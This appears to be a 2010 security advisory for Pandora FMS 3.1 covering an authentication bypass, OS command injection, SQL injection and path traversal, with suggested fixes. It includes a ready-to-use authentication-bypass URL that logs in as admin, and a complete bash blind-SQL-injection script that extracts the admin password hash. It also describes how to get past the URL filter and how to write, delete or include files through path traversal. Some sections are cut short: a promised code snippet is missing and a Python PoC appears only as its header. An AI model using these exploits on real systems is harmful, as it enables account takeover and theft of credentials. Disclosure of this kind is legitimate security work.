Pandora FMS Authentication Bypass and Multiple Input Validation Vulnerabilities
30 Nov. 2010
Summary
Pandora Flexible Monitoring System (Pandora FMS) is vulnereable to Authentication bypass, OS Command Injection, SQL Injection, Blind SQL Injection and Path Traversal.
Credit:
The information has been provided by Juan Galiana Lara.
Vulnerable Systems:
* Pandora FMS Versions prior and including 3.1
Immune Systems:
* Pandora FMS Version 3.1.1
An attacker can execute commands of the operating system, inject remote code in the context of the application, get arbitrary files from the filesystem or extract any data of the database including passwords and confidential information about the monitored network/systems. Also it is possible to bypass the authentication or scale privileges to became admin, gaining full control of the web application and web server. These vulnerabilities have a high impact to the confidentiality, integrity, and availability of the system.
An attacker could access to any account user, including admin, using the "hash login" authentication process. This kind of authentication method works providing a username and a hash. The issue could be exploited remotely providing a username and the md5 of it when $config['loginhash_pwd'] is empty, that in fact is the default
configuration.
Proof of concept:
http://servername/pandora_console/index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1
Got it! admin! :)
By default, any installation of this software allows unauthenticated attackers to perform an authentication bypass and a privilege escalation to admin.
1.1) Additionally, a manual modification in order to use the hash_hmac function instead of the weak statement md5 ( $string . $KEY) is encouraged for security purposes.
Snippet of code (index.php, version 3.1.1):
145 // Hash login process
(...)
150 if ($config["loginhash_pwd"] != "" && $loginhash_data ==
md5($loginhash_user.$config["loginhash_pwd"])) {
In line 150, use
hash_hmac("sha256",$loginhash_user,$config["loginhash_pwd"]), instead of
md5($lioginhash_user.$config["loginhash_pwd"])
2) OS Command Injection - CVE-2010-4278 - CVSS 9/10
The layout parameter in file operation/agentes/networkmap.php is not properly filtered and allows an attacker to inject OS commands.
Snippet of vulnerable code (file operation/agentes/networkmap.php):
# Pandora Flexible Monitoring System SQL Injection PoC
# Juan Galiana Lara
# Gets the list of users and password from the database
#
#configure cookie&host before use it
#usage
#python sqlinj_users.py
#admin:75b756ff2785ea8bb9ae02c13b6a71f1
#...
#!/bin/bash
# Pandora Flexible Monitoring System Blind SQL Injection PoC
# Juan Galiana Lara
# Gets the md5 hash password from a specific user
#
#configure host,cookie&group_id before use it
#usage
#$ ./getpassword.sh
#74b444ff2785ea8bb9ae02c13b6a71f1
HOST="HOST"
TARGET_USER="0x61646d696e" #admin
PATTERN="Interval"
COOKIE="rq842tci6e5ib7t918c6sv1ml4"
CHARSET=(0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v
w x y z)
GROUP_ID=2
j=1
while [[ $j -lt 33 ]]; do
i=0
while [[ $i -lt ${#CHARSET[@]} ]]; do
c=$(printf '%d' "'${CHARSET[$i]}")
URL="http://$HOST/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=$GROUP_ID%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,$j,1%29%29=$c%20and%20id_user=$TARGET_USER%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281";
curl $URL --cookie "PHPSESSID=$COOKIE" 2> /dev/null | grep -q
$PATTERN;
if [ $? -eq 0 ]; then echo -n ${CHARSET[$i]}; break; fi;
let i++
done;
if [[ $i -eq ${#CHARSET[@]} ]]; then echo "Something went wrong!";
exit 1; fi
let j++;
done
echo
exit 0
The fix to these kind of issues was the implementation of a generic filter against sql injection. A proper fix is planned for a major version.
Parameter 'page' of ajax.php is not properly sanitizing user-supplied input. The function safe_url_extraclean is filtering ':' character, and it doesn't allow to use the string "http://" to create urls, but allows '/' character and an attacker could reference remote resources via Windows UNC files, using //servername//resource/file
Note that the first check in safe_url_extraclean is filtering '://', so we can bypass the filter easily doing http://http://url, and it only strips the first protocol://. However, the last preg_replace strips the : character.
Character %00 is not allowed due safe_url_extraclean function filtering, and is not possible to include other files distinct that php files, but still allows . and / characters.
This code is platform dependent bug, you can read more at
http://seclists.org/fulldisclosure/2010/Jul/137
Only works in windows systems, an attacker can include local file using ../ characters due parameter id is not filtered If magic_quotes_gpc is Off, arbitrary files can be included, like boot.ini using NULL character (%00), if not, only php files are allowed
In file operation/agentes/networkmap.php the 'layout' parameter is handled in an insecure way and it is used to write and delete files on the filesystem. An attacker could use this parameter to write in arbitrary paths and even remove files.
Character sequences '../' could be used to write files (due -o parameter in lines 162 and 163), as well as potentially remove files (line 157, 161 and 165) or include them (line 178) As well like in 5.3 this issue is only exploitable in windows environments because the same reason.
